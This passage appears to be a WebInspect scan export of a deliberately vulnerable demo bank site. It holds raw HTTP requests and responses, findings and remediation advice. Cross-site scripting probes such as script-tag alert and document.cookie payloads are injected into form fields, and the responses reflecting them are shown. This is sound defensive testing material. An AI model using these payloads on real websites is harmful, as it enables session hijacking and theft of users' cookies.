urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_cnf/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
GET /plink.asp?a=b&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 167
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?a=b&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=</textarea><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=<attack></textarea><script>alert('XSS')</script></attack>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /dan_o.dat HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:30:15 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:21 GMT
ETag: "aa2978c2a8dc11:8f6"
Content-Length: 9
ABS checkDan-o Log Information DisclosureDan_o.dat log file found. This is a log file from the "Book 'em Dan-o" CGI script at
<A HREF="http://worldwidemart.com/scripts/dano.shtml">Matt's Script Archive</A>. This log file can contain sensitive information about client's that access the site. Sample of dan_o.dat file below:<BR><BR>
Date: 17:51:00 5/01/97<BR>
Address: ts55.wcnet.org<BR>
Agent: Mozilla/2.0 (compatible; MSIE 3.02; Windows 95)<BR><BR>
Date: 13:25:32 5/02/97<BR>
Address: western036.western.wave.ca<br>
Agent: Mozilla/3.01Gold (Win95; I)Remove from the public server.GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |401GET /errors/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:47 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (errors)<B>Found Directory:</B> /errors/ <p>
This directory usually contains an error files or logs that contain sensitive information.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /banklogin.asp?err=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4955
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER></textarea><script>alert('XSS')</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?err=<attack></textarea><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=</textarea><script>alert('XSS')</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=<attack></textarea><script>alert('XSS')</script></attack>&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /cookietest/SetCookies.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/cookietest/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 91
Content-Type: text/html
Cache-control: private
Set-Cookie: Keyed=Var2=Second+Value&Var1=First+Value; path=/
Set-Cookie: Second=Oatmal+Chocolate; path=/
Set-Cookie: FirstCookie=Chocolate+Chip; path=/
<html>
<body>
<a href="ShowCookies.asp">Show me the cookies</a>
</body>
</html>
Non Persistent CookiesCookies are small bits of data that are sent by the web
application but stored locally in the browser. This lets the application
use the cookie to pass information between pages and store variable
information. The web application controls what information is stored in a
cookie and how it is used. Typical types of information stored in cookies
are session Identifiers, personalization and customization information, and
in rare cases even usernames to enable automated logins. <br><br>There are
two different types of cookies: <i>session cookies</i> and <i>persistent
cookies</i>. Session cookies just live In the browser's memory, and are not
stored anywhere. Persistent cookies, however are stored on the browser's
hard drive. This can cause security and privacy issues depending on the
information stored in the cookie and how it is accessed.Remove all 'Expires=' tags from cookies, and ensure
that any COTS software being used does not use the tag (and thus use
persistent cookies). In the case of COTS, it may be necessary to write
custom code that capture the set-cookie statement coming from the COTS and
modifies it to a compliant state.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/cookietest/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=test@<script>alert(document.cookie)</script>.com&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
